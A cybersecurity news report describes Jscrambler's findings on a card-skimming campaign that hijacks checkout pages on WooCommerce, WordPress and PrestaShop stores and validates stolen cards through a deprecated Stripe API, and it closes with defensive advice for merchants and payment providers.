Cybersecurity researchers at Jscamblers have uncovered a sophisticated web-skimming campaign targeting online retailers. The campaign utilizes a legacy application programming interface (API) to validate stolen credit card details in real time before transmitting them to malicious servers. This technique allows attackers to ensure they are only harvesting active and valid card numbers, significantly increasing the efficiency and potential profit of their operations.
According to Jscrambler’s analysis, shared with Hackread.com, this web-skimming operation has been ongoing since at least August 2024. The attack starts with the injection of malicious JavaScript code, designed to mimic legitimate payment forms, into the checkout pages of targeted websites. This code captures customer payment information as it is entered. The second phase involves obfuscation using a base64-encoded string, which conceals crucial URLs from static security analyses, such as those performed by Web Application Firewalls (WAFs).
The key innovation in this campaign lies in its use of a deprecated version of the Stripe API, a popular payment processing service, to verify the card’s validity before the data is sent to the attackers’ servers. In the third stage, the legitimate Stripe iframe is concealed and replaced with a deceptive imitation, and the “Place Order” button is cloned, hiding the original. The entered payment data is validated using Stripe’s API, and card details, if confirmed, are quickly transmitted to a drop server controlled by the attackers. The user is then prompted to reload the page following an error message.
Researchers have identified that affected online retailers are primarily those using popular e-commerce platforms like WooCommerce, WordPress, and PrestaShop. They also observed Silent Skimmer variants, but not consistently. Around 49 affected merchants, a figure suspected to be an underestimate, were identified, along with two domains used to serve the attack’s second and third stages. An additional 20 domains on the same server were also detected. Jscrambler reported that 15 of the compromised sites had addressed the issue.
Further probing revealed that the skimmer scripts are dynamically generated and tailored to each targeted website, indicating a high degree of sophistication and automated deployment. Researchers employed a brute-forcing technique, manipulating the Referrer header, to identify additional victims.
In one instance, the skimmer impersonated a Square payment iframe while in some other instances, the skimmer injected payment options, such as cryptocurrency wallets, dynamically inserting fake MetaMask connection windows. The wallet addresses associated with these attempts showed little to no recent activity, though.
In their blog post, researchers have warned Merchants to implement real-time webpage monitoring solutions to detect unauthorized script injections, whereas Third-Party Service Providers (TPSPs) can enhance security by adopting hardened iframe implementations to prevent iframe hijacking and form modifications.
“Jscrambler’s research team continues to track this campaign, and we urge all online merchants to prioritize security measures against client-side threats,” researchers concluded.
